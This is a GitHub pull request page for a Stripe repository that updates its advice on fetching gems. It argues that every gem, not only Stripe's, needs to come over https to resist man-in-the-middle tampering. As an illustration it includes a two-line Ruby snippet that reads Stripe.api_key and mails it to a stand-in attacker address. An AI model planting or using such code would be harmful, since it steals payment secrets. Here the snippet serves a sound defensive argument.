Update gem security advice #63

merged 1 commit into from May 1, 2013


None yet
2 participants

alexspeller commented Apr 6, 2013

Requesting stripe gems over https doesn't help you if the other gems in your system (e.g. rails) are fetched over http - a MITM attacker could corrupt any gem fetched over http to compromise the stripe code.

For example, if I was an evil attacker, even if you fetched the stripe gem securely, if you fetched rails over HTTP, I could alter the rails gem to include the code:

key  = Stripe.api_key
mail to: "evil@attacker.com", subject: "Someone's secret key", body: key

The only way to ensure gem security against a MITM attacker is to ensure all gems are fetched over https, not just some of them.

@ebroder ebroder merged commit abf5400 into stripe:master May 1, 2013

1 check passed

default The Travis build passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment